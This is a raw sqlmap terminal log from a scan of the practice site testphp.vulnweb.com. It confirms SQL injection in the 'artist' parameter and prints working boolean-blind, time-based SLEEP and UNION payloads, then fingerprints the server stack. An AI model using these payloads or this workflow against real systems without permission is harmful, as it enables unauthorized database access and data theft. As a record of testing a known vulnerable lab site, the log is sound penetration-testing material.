        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.8#pip}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:54:23 /2022-09-11/

[13:54:23] [INFO] using 'STDIN' for parsing targets list
[1/?] URL:
GET http://testphp.vulnweb.com/artists.php?artist=1
do you want to test this URL? [Y/n/q]
> Y
[13:54:23] [INFO] testing URL 'http://testphp.vulnweb.com/artists.php?artist=1'
[13:54:23] [INFO] resuming back-end DBMS 'mysql' 
[13:54:23] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09112022_0154pm.csv' as the CSV results file in multiple targets mode
[13:54:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5360=5360

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8242 FROM (SELECT(SLEEP(5)))LqSh)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-1078 UNION ALL SELECT CONCAT(0x7171717071,0x78596a4b74425444595972434a74454a586156457a4250417456744d576774756a4267646463576a,0x717a6a6a71),NULL,NULL-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[13:54:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[13:54:24] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09112022_0154pm.csv'

[*] ending @ 13:54:24 /2022-09-11/

